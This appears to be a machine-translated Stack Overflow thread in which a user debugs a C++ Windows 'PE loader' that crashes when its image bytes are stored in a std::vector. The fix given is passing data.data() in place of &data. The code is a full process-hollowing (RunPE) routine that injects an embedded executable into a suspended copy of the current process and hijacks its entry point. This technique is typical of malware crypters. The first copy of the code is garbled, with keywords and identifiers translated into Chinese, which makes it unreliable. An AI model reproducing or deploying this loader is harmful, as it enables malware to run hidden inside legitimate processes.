C++ PE加载程序读取访问冲突
当我尝试将其作为无符号字符数组加载时,没有问题C++ PE加载程序读取访问冲突,c++,windows,C++,Windows,当我尝试将其作为无符号字符数组加载时,没有问题 if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // read access violation 有什么问题?我不能把它作为向量加载吗 所有代码如下: unsigned char example[100000]{}; std::矢量数据{ //字节 }; 无效pe_荷载(){ void*pe=&data; 图像_DOS_头*DOS头; 图像头64*n头; 图像\节\头*节头; 处理信息; 新创
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // read access violation
unsigned char example[100000]{};
std::矢量数据{
//字节
};
无效pe_荷载(){
void*pe=&data;
图像_DOS_头*DOS头;
图像头64*n头;
图像\节\头*节头;
处理信息;
新创资讯科技有限公司;
零内存(&PI,sizeof(PI));
零内存(&SI,sizeof(SI));
void*pImageBase;
char currentFilePath[1024];
DOSHeader=PIMAGE\U DOS\U头(pe);
nHeader=PIMAGE\u NT\u HEADERS64(DWORD64(pe)+DOSEADER->e\u lfanew);
如果(n标题->签名==图像\u NT\u签名){
GetModuleFileNameA(NULL,currentFilePath,MAX_PATH);
if(CreateProcessA(currentFilePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&SI,&PI)){
上下文*CTX;
CTX=LPCONTEXT(VirtualAlloc(NULL,sizeof(CTX),MEM_COMMIT,PAGE_READWRITE));
CTX->ContextFlags=CONTEXT\u FULL;
UINT64 imageBase=0;
if(GetThreadContext(PI.hThread,LPCONTEXT(CTX))){
pImageBase=VirtualAllocEx(
PI.hProcess,
LPVOID(n标题->可选标题.ImageBase),
n标题->可选标题.SizeOfImage,
记住承诺,记住保留,
页面\执行\读写
);
WriteProcessMemory(PI.hProcess,pImageBase,pe,NtHeader->OptionalHeader.SizeOfHeaders,NULL);
//写体育课
对于(size\u t i=0;i文件头.NumberOfSections;i++)
{
SectionHeader=PIMAGE_SECTION_HEADER(DWORD64(pe)+DOSEADER->e_lfanew+264+(i*40));
写进程存储器(
PI.hProcess,
LPVOID(DWORD64(pImageBase)+节头->虚拟服装),
LPVOID(DWORD64(pe)+节头->指针或数据),
SectionHeader->SizeOfRawData,
无效的
);
写进程存储器(
PI.hProcess,
LPVOID(CTX->Rdx+0x10),
LPVOID(&n标题->OptionalHeader.ImageBase),
8.
无效的
);
}
CTX->Rcx=DWORD64(pImageBase)+nHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread,LPCONTEXT(CTX));
恢复线程(PI.hThread);
WaitForSingleObject(PI.hProcess,NULL);
}
}
}
}
我不知道这到底是什么原因。但我确实需要你的帮助,我什么也找不到。它可以很好地处理char数组,但我想将其作为向量加载。从现在开始谢谢您。
void*pe=&data看起来像个问题。你是说void*pe=data.data()?@PatrickRoberts非常感谢你。我不知道我忽略了它。我为自己现在问这么愚蠢的问题感到羞愧。
unsigned char example[100000]{};
std::vector<unsigned char> data{
// Bytes
};
void pe_load() {
void* pe = &data;
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS64* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
void* pImageBase;
char currentFilePath[1024];
DOSHeader = PIMAGE_DOS_HEADER(pe);
NtHeader = PIMAGE_NT_HEADERS64(DWORD64(pe) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
GetModuleFileNameA(NULL, currentFilePath, MAX_PATH);
if (CreateProcessA(currentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) {
CONTEXT* CTX;
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
UINT64 imageBase = 0;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
pImageBase = VirtualAllocEx(
PI.hProcess,
LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
WriteProcessMemory(PI.hProcess, pImageBase, pe, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
//write pe sections
for (size_t i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
{
SectionHeader = PIMAGE_SECTION_HEADER(DWORD64(pe) + DOSHeader->e_lfanew + 264 + (i * 40));
WriteProcessMemory(
PI.hProcess,
LPVOID(DWORD64(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD64(pe) + SectionHeader->PointerToRawData),
SectionHeader->SizeOfRawData,
NULL
);
WriteProcessMemory(
PI.hProcess,
LPVOID(CTX->Rdx + 0x10),
LPVOID(&NtHeader->OptionalHeader.ImageBase),
8,
NULL
);
}
CTX->Rcx = DWORD64(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
WaitForSingleObject(PI.hProcess, NULL);
}
}
}
}